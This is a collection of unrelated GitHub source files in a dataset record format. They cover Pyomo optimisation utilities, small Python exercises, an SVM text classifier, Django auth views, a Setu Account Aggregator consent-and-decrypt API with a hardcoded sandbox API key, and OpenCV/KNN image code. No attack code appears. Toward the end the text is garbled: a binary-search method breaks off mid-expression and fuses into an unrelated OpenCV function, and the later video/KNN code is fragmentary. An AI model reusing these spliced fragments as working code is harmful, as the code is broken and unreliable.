'%s_constraints_list' % prefix)\n if v.body.polynomial_degree() not in (0, 1)])\n\n\ndef record_original_model_statistics(solve_data, config):\n \"\"\"Record problem statistics for original model and setup SolverResults.\"\"\"\n # Create the solver results object\n res = solve_data.results = SolverResults()\n prob = res.problem\n origGDPopt = solve_data.original_model.GDPopt_utils\n res.problem.name = solve_data.working_model.name\n res.problem.number_of_nonzeros = None # TODO\n # TODO work on termination condition and message\n res.solver.termination_condition = None\n res.solver.message = None\n # TODO add some kind of timing\n res.solver.user_time = None\n res.solver.system_time = None\n res.solver.wallclock_time = None\n res.solver.termination_message = None\n\n # Classify the variables\n orig_binary = sum(1 for v in origGDPopt.orig_var_list if v.is_binary())\n orig_continuous = sum(\n 1 for v in origGDPopt.orig_var_list if v.is_continuous())\n orig_integer = sum(1 for v in origGDPopt.orig_var_list if v.is_integer())\n\n # Get count of constraints and variables\n prob.number_of_constraints = len(origGDPopt.orig_constraints_list)\n prob.number_of_disjunctions = len(origGDPopt.orig_disjunctions_list)\n prob.number_of_variables = len(origGDPopt.orig_var_list)\n prob.number_of_binary_variables = orig_binary\n prob.number_of_continuous_variables = orig_continuous\n prob.number_of_integer_variables = orig_integer\n\n config.logger.info(\n \"Original model has %s constraints (%s nonlinear) \"\n \"and %s disjunctions, \"\n \"with %s variables, of which %s are binary, %s are integer, \"\n \"and %s are continuous.\" %\n (prob.number_of_constraints,\n len(origGDPopt.orig_nonlinear_constraints),\n prob.number_of_disjunctions,\n prob.number_of_variables,\n orig_binary,\n orig_integer,\n orig_continuous))\n\n\ndef record_working_model_statistics(solve_data, config):\n \"\"\"Record problem statistics for preprocessed model.\"\"\"\n GDPopt = solve_data.working_model.GDPopt_utils\n now_binary = sum(1 for v in GDPopt.working_var_list if v.is_binary())\n now_continuous = sum(\n 1 for v in GDPopt.working_var_list if v.is_continuous())\n now_integer = sum(1 for v in GDPopt.working_var_list if v.is_integer())\n assert now_integer == 0, \"Unreformulated, unfixed integer variables found.\"\n\n config.logger.info(\n \"After preprocessing, model has %s constraints (%s nonlinear) \"\n \"and %s 
disjunctions, \"\n \"with %s variables, of which %s are binary and %s are continuous.\" %\n (len(GDPopt.working_constraints_list),\n len(GDPopt.working_nonlinear_constraints),\n len(GDPopt.working_disjunctions_list),\n len(GDPopt.working_var_list),\n now_binary,\n now_continuous))\n\n\ndef reformulate_integer_variables(model, config):\n integer_vars = list(\n v for v in model.component_data_objects(\n ctype=Var, descend_into=(Block, Disjunct))\n if v.is_integer() and not v.fixed)\n if len(integer_vars) == 0:\n return # if no free integer variables, no reformulation needed.\n\n if config.reformulate_integer_vars_using is None:\n config.logger.warning(\n \"Model contains unfixed integer variables. \"\n \"GDPopt will reformulate using base 2 binary variables \"\n \"by default. To specify a different method, see the \"\n \"reformulate_integer_vars_using configuration option.\")\n config.reformulate_integer_vars_using = 'base2_binary'\n\n config.logger.info(\n \"Reformulating integer variables using the %s strategy.\"\n % config.reformulate_integer_vars_using)\n\n # Set up reformulation block\n reform_block = model.GDPopt_utils.integer_reform = Block(\n doc=\"Holds variables and constraints for reformulating \"\n \"integer variables to binary variables.\")\n reform_block.new_binary_var = Var(\n Any, domain=Binary, dense=False,\n doc=\"Binary variable with index (int_var.name, indx)\")\n reform_block.integer_to_binary_constraint = Constraint(\n Any, doc=\"Equality constraints mapping the binary variable values \"\n \"to the integer variable value.\")\n\n # check that variables are bounded and non-negative\n for int_var in integer_vars:\n if not (int_var.has_lb() and int_var.has_ub()):\n raise ValueError(\n \"Integer variable %s is missing an \"\n \"upper or lower bound. LB: %s; UB: %s. \"\n \"GDPopt does not support unbounded integer variables.\"\n % (int_var.name, int_var.lb, int_var.ub))\n if int_var.lb < 0:\n raise ValueError(\n \"Integer variable %s can be negative. \"\n \"GDPopt currently only supports positive integer \"\n \"variables.\" % (int_var.name)\n )\n # do the reformulation\n highest_power = floor(log(value(int_var.ub), 2))\n var_name = int_var.name\n reform_block.integer_to_binary_constraint.add(\n var_name, expr=int_var == sum(\n reform_block.new_binary_var[var_name, pwr] * (2 ** pwr)\n for pwr in range(0, int(highest_power) + 1)))\n int_var.domain = NonNegativeReals\n\n config.logger.info(\n \"Reformulated %s integer variables using \"\n \"%s binary variables and %s constraints.\"\n % (len(integer_vars), len(reform_block.new_binary_var),\n len(reform_block.integer_to_binary_constraint)))\n\n\ndef validate_disjunctions(model, config):\n \"\"\"Validate that the active disjunctions on the model are satisfied\n by the current disjunct indicator_var values.\"\"\"\n active_disjunctions = model.component_data_objects(\n ctype=Disjunction, active=True, descend_into=(Block, Disjunct))\n for disjtn in active_disjunctions:\n sum_disj_vals = sum(disj.indicator_var.value\n for disj in disjtn.disjuncts)\n if disjtn.xor and fabs(sum_disj_vals - 1) > config.integer_tolerance:\n raise ValueError(\n \"Expected disjunct values to add up to 1 \"\n \"for XOR disjunction %s. \"\n \"Instead, values add up to %s.\" % (disjtn.name, sum_disj_vals))\n elif sum_disj_vals + config.integer_tolerance < 1:\n raise ValueError(\n \"Expected disjunct values to add up to at least 1 for \"\n \"OR disjunction %s. 
\"\n \"Instead, values add up to %s.\" % (disjtn.name, sum_disj_vals))\n\n\ndef algorithm_is_making_progress(solve_data, config):\n \"\"\"Make sure that the algorithm is making sufficient progress\n at each iteration to continue.\"\"\"\n\n # TODO if backtracking is turned on, and algorithm visits the same point\n # twice without improvement in objective value, turn off backtracking.\n\n # TODO stop iterations if feasible solutions not progressing for a number\n # of iterations.\n\n # If the hybrid algorithm is not making progress, switch to OA.\n # required_feas_prog = 1E-6\n # if solve_data.working_model.GDPopt_utils.objective.sense == minimize:\n # sign_adjust = 1\n # else:\n # sign_adjust = -1\n\n # Maximum number of iterations in which feasible bound does not\n # improve before terminating algorithm\n # if (len(feas_prog_log) > config.algorithm_stall_after and\n # (sign_adjust * (feas_prog_log[-1] + required_feas_prog)\n # >= sign_adjust *\n # feas_prog_log[-1 - config.algorithm_stall_after])):\n # config.logger.info(\n # 'Feasible solutions not making enough progress '\n # 'for %s iterations. Algorithm stalled. Exiting.\\n'\n # 'To continue, increase value of parameter '\n # 'algorithm_stall_after.'\n # % (config.algorithm_stall_after,))\n # return False\n\n return True\n\n\ndef algorithm_should_terminate(solve_data, config):\n \"\"\"Check if the algorithm should terminate.\n\n Termination conditions based on solver options and progress.\n\n \"\"\"\n # Check bound convergence\n if solve_data.LB + config.bound_tolerance >= solve_data.UB:\n config.logger.info(\n 'GDPopt exiting on bound convergence. '\n 'LB: %s + (tol %s) >= UB: %s' %\n (solve_data.LB, config.bound_tolerance,\n solve_data.UB))\n return True\n\n # Check iteration limit\n if solve_data.master_iteration >= config.iterlim:\n config.logger.info(\n 'GDPopt unable to converge bounds '\n 'after %s master iterations.'\n % (solve_data.master_iteration,))\n config.logger.info(\n 'Final bound values: LB: %s UB: %s'\n % (solve_data.LB, solve_data.UB))\n return True\n\n if not algorithm_is_making_progress(solve_data, config):\n config.logger.debug(\n 'Algorithm is not making enough progress. 
'\n 'Exiting iteration loop.')\n return True\n return False\n\n\ndef copy_and_fix_mip_values_to_nlp(var_list, val_list, config):\n \"\"\"Copy MIP solution values to the corresponding NLP variable list.\n\n Fix binary variables and optionally round their values.\n\n \"\"\"\n for var, val in zip(var_list, val_list):\n if val is None:\n continue\n if not var.is_binary():\n var.value = val\n elif ((fabs(val) > config.integer_tolerance and\n fabs(val - 1) > config.integer_tolerance)):\n raise ValueError(\n \"Binary variable %s value %s is not \"\n \"within tolerance %s of 0 or 1.\" %\n (var.name, var.value, config.integer_tolerance))\n else:\n # variable is binary and within tolerances\n if config.round_NLP_binaries:\n var.fix(int(round(val)))\n else:\n var.fix(val)\n","repo_name":"rowhit/pyomo","sub_path":"pyomo/contrib/gdpopt/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":19207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"14744232404","text":"# Game, Set, Match\n\n\nimport csv\n\n\ndef main():\n # Read the CSV file\n data = read_csv_file(\"wimbledon.csv\")\n\n # Get the champions and the number of times they have won\n champions = get_champions(data)\n\n # Display the champions and the number of times they have won\n print(\"Wimbledon Champions:\")\n for name, count in champions.items():\n print(f\"{name} {count}\")\n\n # Get the countries of the champions\n countries = get_countries(data)\n\n # Display the countries of the champions in alphabetical order\n print(\"\\nThese\", len(countries), \"countries have won Wimbledon:\")\n print(\", \".join(sorted(countries)))\n\n\ndef read_csv_file(filename):\n \"\"\"\n Reads a CSV file and returns its contents as a list of lists.\n \"\"\"\n with open(filename, \"r\", encoding=\"utf-8-sig\") as in_file:\n reader = csv.reader(in_file)\n return [row for row in reader]\n\n\ndef get_champions(data):\n \"\"\"\n Returns a dictionary containing the champions and the number of times they have won.\n \"\"\"\n champions = {}\n for row in data:\n if row[0] != \"Year\": # Skip the header row\n name = row[2]\n champions[name] = champions.get(name, 0) + 1\n return champions\n\n\ndef get_countries(data):\n \"\"\"\n Returns a set of the countries of the champions.\n \"\"\"\n countries = set()\n for row in data:\n if row[0] != \"Year\": # Skip the header row\n country = row[1]\n countries.add(country)\n return countries\n\n\nmain()\n","repo_name":"tamil290/CP1404","sub_path":"Practical_5/wimbledon.py","file_name":"wimbledon.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4246647109","text":"\n \n\n# create a random dictionary of words and their definitions\nimport profile\n\n\nports_protocols = {\n \"21\": \"FTP\",\n \"22\": \"SSH\",\n \"23\": \"TELNET\",\n \"25\": \"SMTP\",\n \"53\": \"DNS\",\n \"80\": \"HTTP\",\n \"443\": \"HTTPS\",\n \"3306\": \"MYSQL\",\n \"5432\": \"POSTGRESQL\"}\n\nfrom memory_profiler import profile\nimport timeit\n\n@profile(precision=2)\ndef create_dictionary():\n words = ['apple', 'banana', 'orange', 'coconut', 'strawberry', 'lime', 'grapefruit', 'lemon', 'kumquat', 'blueberry', 'melon']\n dictionary = {}\n for word in words:\n definition = word + \" is a fruit.\"\n dictionary[word] = definition\n return dictionary # return the dictionary\n\n\nprint(timeit.timeit(\"create_dictionary()\", setup=\"from __main__ import create_dictionary\",number=1))\n\n# for x in 
dict1:\n# print(x, dict1[x])","repo_name":"maxacode/Technical-Interview-Prep-Sites","sub_path":"Individual Functions Practice/memory_profiler.py","file_name":"memory_profiler.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"1148001315","text":"batch_size = 128\nalpha_channels = 3\nwidth = 16\nheight = 16\n\nfilter_height = 5\nfilter_width = filter_height\nconvolutional_channels = 6\nconvolutional_skip = 2\npool_skip = 2\n# from get_bottleneck_data import TOP_CLASSES\n# len(TOP_CLASSES)\nnum_targets = 1623 + 1\nlearning_rate = 0.01\nnum_steps = 5000\n\nnum_bottlenecks = 1001\n","repo_name":"joshbrowning2358/cDiscount","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3937079214","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 19 15:07:16 2018\n\n@author: dadangewp\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\nfrom dataReader import parse_training\nfrom dataReader import parse_testing\nimport configFeature as cfgFeature\nimport featureManager\nfrom sklearn import svm\nfrom sklearn import tree\nfrom sklearn import metrics\nfrom sklearn.metrics.scorer import make_scorer\nfrom sklearn.metrics import f1_score, classification_report, accuracy_score, make_scorer\nfrom sklearn.model_selection import cross_val_score, cross_val_predict\n\n\n\nDIR_TRAIN = \"D:\\\\PhD\\\\Misogyny Detection\\\\Evalita\\\\en_training_taskb.tsv\"\nDIR_TEST = \"D:\\\\PhD\\\\Misogyny Detection\\\\Evalita\\\\en_testing_taskb_linear.tsv\"\n\noriginalclass = []\npredictedclass = []\n\ndef classification_report_with_accuracy_score(y_true, y_pred):\n #print (classification_report(y_true, y_pred)) # print classification report\n originalclass.extend(y_true)\n predictedclass.extend(y_pred)\n return accuracy_score(y_true, y_pred) # return accuracy score\n\nif __name__ == '__main__':\n \n print (\"started ...\")\n TASK = \"B-English\" # Define, A or B\n FNAME = './predictions-task' + TASK + '.txt'\n PREDICTIONSFILE = open(FNAME, \"w\")\n # read Training data\n #print (\"load wordvector\")\n #word2vec = gensim.models.KeyedVectors.load_word2vec_format('GoogleNews-vectors-negative300.bin', binary=True)\n #word2vec = dict(zip(model.wv.index2word, model.wv.syn0))\n #print (\"wordvector load finished\")\n word2vec = \"zonk\"\n feature_manager=featureManager.make_feature_manager()\n dataTrain, dataLabel = parse_training(DIR_TRAIN)\n dataTest = parse_testing(DIR_TEST)\n print (\"Training data read\") \n feature_names=cfgFeature.feature_list['feature_names']\n #stuff = range(0, len(feature_names) )\n #parameters=[]\n #parameters_optimized=[]\n #highest=0\n #max_feature_set=[]\n #for L in range(1, len(stuff)+1):\n #for subset in combinations(stuff, L):\n #X_train,X_test=feature_manager.create_feature_space(dataTrain, word2vec, feature_names[list(subset)], train_tweets=None)\n #clf = svm.LinearSVC()\n #print (\"training start\")\n #clf.fit(X_train, dataLabel)\n #print (\"training done\")\n #scores = cross_val_score(clf, X_train, dataLabel, cv=10) \n #acc = scores.mean()\n #predicted = cross_val_predict(clf,X_train,dataLabel,cv=10)\n #score = metrics.f1_score(dataLabel, predicted, pos_label=1)\n #print(feature_names[list(subset)])\n #print(score)\n #if score > 0.65:\n #print(str(feature_names[list(subset)]))\n #PREDICTIONSFILE.write(str(feature_names[list(subset)])+\";\")\n 
#print(score)\n #PREDICTIONSFILE.write(str(score))\n #PREDICTIONSFILE.write(\"\\n\")\n X_train, X_test = feature_manager.create_feature_space(dataTrain, dataTest, feature_names)\n #print (X_train.shape)\n #print (X_test.shape)\n clf = svm.LinearSVC()\n clf.fit(X_train,dataLabel)\n \n #print(cross_val_score(clf, X_train, dataLabel, cv=10, scoring=\"accuracy\"))\n scores = cross_val_score(clf, X_train, dataLabel, cv=10, scoring=make_scorer(f1_score, average='macro'))\n print(scores)\n print(\"Accuracy (Cross-V): %0.3f (+/- %0.2f)\" % (scores.mean(), scores.std() * 2))\n #nested_score = cross_val_score(clf, X=X_train, y=dataLabel, cv=10, \\\n #           scoring=make_scorer(classification_report_with_accuracy_score))\n #print(classification_report(originalclass, predictedclass, digits=3))\n #predicted = cross_val_predict(clf,X_train,dataLabel,cv=10)\n predicted = clf.predict(X_test)\n #score = metrics.f1_score(labelTest, predicted, pos_label=1)\n #scoreTrain = metrics.f1_score(dataLabel, predictedTrain, pos_label=1)\n #print (\"F1-score Task\", TASK, score)\n #print (scoreTrain)\n for p in predicted:\n PREDICTIONSFILE.write(\"{}\\n\".format(p))\n PREDICTIONSFILE.close()\n ","repo_name":"dadangewp/misogyny-project","sub_path":"IberEval_Misogyny-Detection-LinearSVC/misogyny_TaskA.py","file_name":"misogyny_TaskA.py","file_ext":"py","file_size_in_byte":3993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"18523130874","text":"from django.shortcuts import render, redirect\nfrom .forms import RegisterForm, LoginForm\nfrom django.contrib.auth import login\nfrom django.contrib.auth import logout\n\n\ndef user_login(request):\n if request.method == \"POST\":\n form = LoginForm(data=request.POST)\n if form.is_valid():\n login(request, form.user_cache)\n return redirect(\"blog:index\")\n else:\n form = LoginForm()\n return render(request, \"login_and_register/login.html\", {\"form\": form})\n\n\ndef user_register(request):\n if request.method == \"POST\":\n form = RegisterForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect(\"login_and_register:login\")\n\n # form.save()\n else:\n form = RegisterForm()\n\n return render(request, \"login_and_register/register.html\", {\"form\": form})\n\n\ndef user_logout(request):\n logout(request)\n return redirect(\"blog:index\")\n\n","repo_name":"radgra/django_blog","sub_path":"login_and_register/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"21129810900","text":"arr = [1, 2, 3]\n\nN = 3#len arr\n\n#data that holds the results as they are used\nsel = [0] * N#list where the results are stored\ncheck = [0] * N#check for whether each element has already been used\n\ndef comb(idx):\n if idx == N:\n print(sel)\n return\n for i in range(idx, N):\n if not check[i]:\n check[i] = True\n sel[i] = arr[i]\n comb(i+1)\ncomb(0)\n","repo_name":"Gyujeong-Lee/Algorithm_study","sub_path":"0419/comb.py","file_name":"comb.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"33924653329","text":"import json\nfrom django.shortcuts import render\nfrom requests.api import request\nfrom rest_framework import serializers\nfrom rest_framework.response import Response\nimport codecs\nimport requests\nimport jwt\nimport uuid\nfrom datetime import datetime\nimport time\nfrom django.views import View\nfrom rest_framework.serializers import Serializer\nfrom 
rest_framework.views import APIView\nimport requests\nimport logging\nimport base64\nfrom http.client import HTTPConnection # py3\nfrom .serializer import UserSerializer, TransactionSerializer, GoalSerializer\nfrom .models import User, Transaction, Goal\nfrom rest_framework.generics import CreateAPIView, ListAPIView, ListCreateAPIView, UpdateAPIView, DestroyAPIView, RetrieveUpdateAPIView\n\n\nclass createConsent(APIView):\n\n def post(self, request):\n mobileNumber = request.data.get(\"mobile\")\n body = createData(mobileNumber)\n privateKey = codecs.open(\n \"/home/radhika/hfi/prthvi/server/api/keys/private_key.pem\", encoding=\"utf-8\").read()\n detachedJWS = makeDetachedJWS(privateKey, body)\n url = \"https://aa-sandbox.setu.co/Consent\"\n headers = {\n \"Content-Type\": \"application/json\",\n \"client_api_key\": \"bac41217-a584-4f79-bd79-5285adb61037\",\n \"x-jws-signature\": detachedJWS,\n }\n response = requests.post(url, headers=headers, json=body)\n response = response.json()\n resUrl = \"https://anumati.setu.co/\" + response[\"ConsentHandle\"] + \\\n \"?redirect_url=http://484c-103-250-137-194.ngrok.io/redirect/\"\n return Response(resUrl)\n\n\nclass consentNotification(APIView):\n def post(self, request):\n consentId = request.data.get(\n \"ConsentStatusNotification\").get(\"consentId\")\n consentStatus = request.data.get(\n \"ConsentStatusNotification\").get(\"consentStatus\")\n if consentStatus == \"ACTIVE\":\n fetchSignedConsent(consentId)\n dateNow = datetime\n res = {\n \"ver\": \"1.0\",\n \"timestamp\": dateNow.now().strftime(\"%Y-%m-%dT%H:%M:%S.000Z\"),\n \"txnid\": str(uuid.uuid4()),\n \"response\": \"OK\",\n }\n return Response(res)\n\n\ndef createData(mobileNumber):\n dateNow = datetime\n expiry = time.time()\n data = {\n \"ver\": \"1.0\",\n \"timestamp\": dateNow.now().strftime(\"%Y-%m-%dT%H:%M:%S.000Z\"),\n \"txnid\": str(uuid.uuid4()),\n \"ConsentDetail\": {\n \"consentStart\": dateNow.now().strftime(\"%Y-%m-%dT%H:%M:%S.000Z\"),\n \"consentExpiry\": \"2021-12-03T14:25:33.440Z\",\n \"consentMode\": \"VIEW\",\n \"fetchType\": \"ONETIME\",\n \"consentTypes\": [\"TRANSACTIONS\", \"PROFILE\", \"SUMMARY\"],\n \"fiTypes\": [\"DEPOSIT\", \"MUTUAL_FUNDS\"],\n \"DataConsumer\": {\"id\": \"1fbad2f2-ce8c-4127-b24b-df360f57b06c\"},\n \"Customer\": {\"id\": mobileNumber + \"@setu-aa\"},\n \"Purpose\": {\n \"code\": \"101\",\n \"refUri\": \"https://api.rebit.org.in/aa/purpose/101.xml\",\n \"text\": \"Wealth management service\",\n \"Category\": {\"type\": \"string\"},\n },\n \"FIDataRange\": {\n \"from\": \"2021-1-06T11:39:57.153Z\",\n \"to\": \"2021-06-30T14:25:33.440Z\",\n },\n \"DataLife\": {\"unit\": \"MONTH\", \"value\": 0},\n \"Frequency\": {\"unit\": \"MONTH\", \"value\": 100},\n \"DataFilter\": [\n {\n \"type\": \"TRANSACTIONAMOUNT\",\n \"operator\": \">=\",\n \"value\": \"0\",\n },\n ],\n },\n }\n return data\n\n\ndef makeDetachedJWS(privateKey, body):\n\n encoded = jwt.encode(body, privateKey, algorithm=\"RS256\")\n encoded = encoded.split(\".\")\n encoded[1] = \"\"\n return \".\".join(encoded)\n\n\ndef fetchSignedConsent(consentId):\n privateKey = codecs.open(\n \"/home/radhika/hfi/prthvi/server/api/keys/private_key.pem\", encoding=\"utf-8\").read()\n detachedJWS = makeDetachedJWS(privateKey, {\"Consent\": consentId})\n url = \"https://aa-sandbox.setu.co/Consent/\" + consentId\n headers = {\n \"Content-Type\": \"application/json\",\n \"client_api_key\": \"bac41217-a584-4f79-bd79-5285adb61037\",\n \"x-jws-signature\": detachedJWS,\n }\n response = requests.get(url, 
headers=headers)\n response = response.json()\n fiDataRequest(response[\"signedConsent\"], consentId)\n\n\ndef fiDataRequest(signedConsent, consentId):\n keys = generateKeyMaterial()\n requestBody = requestDataBody(\n signedConsent, consentId, keys[\"KeyMaterial\"])\n privateKey = codecs.open(\n \"/home/radhika/hfi/prthvi/server/api/keys/private_key.pem\", encoding=\"utf-8\").read()\n detachedJWS = makeDetachedJWS(privateKey, requestBody)\n url = \"https://aa-sandbox.setu.co/FI/request\"\n headers = {\n \"Content-Type\": \"application/json\",\n \"client_api_key\": \"bac41217-a584-4f79-bd79-5285adb61037\",\n \"x-jws-signature\": detachedJWS,\n }\n data = requestBody\n response = requests.post(url, headers=headers, json=data)\n response = response.json()\n fiDataFetch(response[\"sessionId\"],\n keys[\"privateKey\"], keys[\"KeyMaterial\"])\n\n\ndef generateKeyMaterial():\n url = \"https://rahasya.setu.co/ecc/v1/generateKey\"\n response = requests.get(url)\n response = response.json()\n return response\n\n\ndef requestDataBody(signedConsent, consent_id, keys):\n dateNow = datetime\n data = {\n \"ver\": \"1.0\",\n \"timestamp\": dateNow.now().strftime(\"%Y-%m-%dT%H:%M:%S.000Z\"),\n \"txnid\": str(uuid.uuid4()),\n \"FIDataRange\": {\n \"from\": \"2021-1-06T11:39:57.153Z\",\n \"to\": \"2021-06-30T14:25:33.440Z\",\n },\n\n \"Consent\": {\n \"id\": consent_id,\n \"digitalSignature\": signedConsent.split(\".\")[2],\n },\n \"KeyMaterial\": keys,\n }\n return data\n\n\ndef fiDataFetch(session_id, encryption_privateKey, keyMaterial):\n privateKey = codecs.open(\n \"/home/radhika/hfi/prthvi/server/api/keys/private_key.pem\", encoding=\"utf-8\").read()\n detachedJWS = makeDetachedJWS(privateKey, {\"a\": \"b\"})\n url = \"https://aa-sandbox.setu.co/FI/fetch/\" + session_id\n headers = {\n \"Content-Type\": \"application/json\",\n \"client_api_key\": \"bac41217-a584-4f79-bd79-5285adb61037\",\n \"x-jws-signature\": detachedJWS,\n }\n response = requests.get(url, headers=headers)\n response = response.json()\n decryptData(response[\"FI\"], encryption_privateKey, keyMaterial)\n\n\ndef decryptData(fi, privateKey, keyMaterial):\n fi_data = fi[0]\n body = {\n \"base64Data\": fi_data[\"data\"][0][\"encryptedFI\"],\n \"base64RemoteNonce\": fi_data[\"KeyMaterial\"][\"Nonce\"],\n \"base64YourNonce\": keyMaterial[\"Nonce\"],\n \"ourPrivateKey\": privateKey,\n \"remoteKeyMaterial\": fi_data[\"KeyMaterial\"],\n }\n url = \"https://rahasya.setu.co/ecc/v1/decrypt\"\n data = body\n response = requests.post(url, json=data)\n response = response.json()\n base64Data = response[\"base64Data\"]\n b64_str = base64Data.encode('ascii')\n b64_bytes = base64.b64decode(b64_str)\n data = b64_bytes.decode('ascii')\n data = json.loads(data)\n\n print(\"LALALALlalalallALLA\")\n print(data)\n\n if User.objects.filter(accountNumber = data[\"account\"][\"maskedAccNumber\"]).exists():\n ###Update User###\n user = User.objects.get(accountNumber = data[\"account\"][\"maskedAccNumber\"])\n user.userName = data[\"account\"][\"profile\"][\"holders\"][\"holder\"][\"name\"]\n user.balance = data[\"account\"][\"summary\"][\"currentBalance\"]\n user.save()\n else:\n ###Create User###\n accountData = {\n \"accountNumber\": data[\"account\"][\"maskedAccNumber\"],\n \"userName\": data[\"account\"][\"profile\"][\"holders\"][\"holder\"][\"name\"],\n \"balance\": data[\"account\"][\"summary\"][\"currentBalance\"]\n }\n serializer = UserSerializer(data=accountData)\n if serializer.is_valid():\n serializer.save()\n \n for i in 
data[\"account\"][\"transactions\"][\"transaction\"]:\n \n if Transaction.objects.filter(accountNumber = data[\"account\"][\"maskedAccNumber\"]).exists():\n ###Update Transaction###\n txn = Transaction.objects.get(accountNumber = data[\"account\"][\"maskedAccNumber\"])\n txn.mode = i[\"mode\"]\n txn.type = i[\"type\"]\n txn.txnId = i[\"txnId\"]\n txn.amount = i[\"amount\"]\n txn.narration = i[\"narration\"]\n txn.valueDate = i[\"valueDate\"]\n txn.balance = i[\"currentBalance\"]\n txn.save()\n else:\n ###Create Transaction###\n transactionData = {\n \"accountNumber\": data[\"account\"][\"maskedAccNumber\"],\n \"mode\": i[\"mode\"],\n \"type\": i[\"type\"],\n \"txnId\": i[\"txnId\"],\n \"amount\": i[\"amount\"],\n \"narration\": i[\"narration\"],\n \"valueDate\": i[\"valueDate\"],\n \"balance\": i[\"currentBalance\"]\n }\n serializer = TransactionSerializer(data=transactionData)\n if serializer.is_valid():\n serializer.save()\n\nclass viewTxn(APIView):\n def get(self, request):\n queryset = Transaction.objects.all().values()\n array = []\n for i in queryset:\n if i[\"valueDate\"].split(\"-\")[1] == \"06\" and i[\"type\"] == \"DEBIT\":\n array.append(i)\n return Response(array)\n\n\nclass get1per(APIView):\n\n def get(self, request):\n txn = Transaction.objects.filter(\n valueDate=\"2021-06-08\").values(\"amount\")[0][\"amount\"]\n txn = txn/100\n return Response(txn)\n\n\nclass getGoal(ListAPIView):\n queryset = Goal.objects.all()\n serializer_class = GoalSerializer\n\nclass editGoal(APIView):\n def put(self,request):\n CauseType = request.data.get('causeType')\n DonationItem = request.data.get('donationItem')\n ItemQuantity = request.data.get('itemQuantity')\n ItemPrice = request.data.get('itemPrice')\n if Goal.objects.filter(donationItem = DonationItem).exists():\n ###Update Goal###\n goal = Goal.objects.get(donationItem = DonationItem)\n goal.causeType = CauseType\n goal.itemQuantity = ItemQuantity\n goal.itemPrice = ItemPrice\n goal.save()\n else:\n ###Create Goal###\n goalData = {\n \"causeType\": CauseType,\n \"donationItem\": DonationItem,\n \"itemQuantity\": ItemQuantity,\n \"itemPrice\": ItemPrice,\n }\n serializer = GoalSerializer(data=goalData)\n if serializer.is_valid():\n serializer.save()\n return Response()\n\nclass viewUserData(ListAPIView):\n queryset = User.objects.all()\n serializer_class = UserSerializer","repo_name":"RadhikaSheth/Prthvi","sub_path":"server/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32579607594","text":"#\n# @lc app=leetcode.cn id=790 lang=python3\n#\n# [790] 多米诺和托米诺平铺\n#\n\n# @lc code=start\nclass Solution:\n def numTilings(self, n: int) -> int:\n MOD = 10 ** 9 + 7\n dp = [[0] * 4 for _ in range(n + 1)]\n dp[0][3] = 1\n for i in range(1, n + 1):\n dp[i][0] = dp[i - 1][3]\n dp[i][1] = (dp[i - 1][0] + dp[i - 1][2]) % MOD\n dp[i][2] = (dp[i - 1][0] + dp[i - 1][1]) % MOD\n dp[i][3] = (((dp[i - 1][0] + dp[i - 1][1]) % MOD + dp[i - 1][2]) % MOD + dp[i - 1][3]) % MOD\n return dp[n][3]\n# @lc code=end\n\n","repo_name":"Phil2ng/LeetCode","sub_path":"790.多米诺和托米诺平铺.py","file_name":"790.多米诺和托米诺平铺.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24011971044","text":"class Solution(object):\n def searchInsert(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: int\n \"\"\"\n \n if 
len(nums)==0:\n return 0\n else:\n start = 0\n end = len(nums)-1\n mid = (start+end)//2\n # print(start,mid,end)\n while (end-start)>2:\n print(nums[start],nums[mid],nums[end])\n if nums[mid]=target:\n return start\n elif nums[end]list:\n\n xmin,xmax,ymin,ymax,mat=self.mini_img(img)\n img=img[ymin:ymax,xmin:xmax]\n img1=img.copy()\n img1=cv.cvtColor(img,cv.COLOR_BGR2HSV)\n img1[mat!=255]=[0,0,0]\n # B,G,R=cv.split(img1)\n # #hhh=img.copy()\n # R[R!=0]=0\n # G[G!=0]=0\n # hhh=cv.merge([B,G,R])\n if see_make:\n cv.imshow('rrr',mat)\n cv.imshow('ooo',img)\n cv.imshow('ppp',img1)\n #cv.imshow('yyy',hhh)\n #cv.imshow('uuu',mmm)\n cv.waitKey(0) \n cv.destroyAllWindows()\n\n hist1 = cv.calcHist([img1],[0], None, [15], [1.0,255.0])\n #hist2 = cv.calcHist([img1],[1], None, [3], [1.0,255.0])\n hist3 = cv.calcHist([img1],[2], None, [5], [1.0,255.0])\n #print(hist6)\n\n hist1=hist1/np.sum(hist1)\n #hist2=hist2/np.sum(hist2)\n hist3=hist3/np.sum(hist3)\n hist=np.concatenate((hist1,hist3),axis=0)\n return hist,mat,(xmin,xmax,ymin,ymax)\n\ndef init_get_video(classname,video_name,num_of_photo,path,update_data=False):\n flag=0\n try:\n os.mkdir(os.path.join(path,video_name))\n except Exception as Error:\n print(Error)\n flag=1\n for i in classname:\n try:\n length=len(os.listdir(os.path.join(path,video_name,i)))\n except Exception as Error:\n flag=0\n break\n if length.2f}\".format(sum(fps)/len(fps)))\n return acc\n\n KKK=KNNClassifier(video_name,modelpath)\n 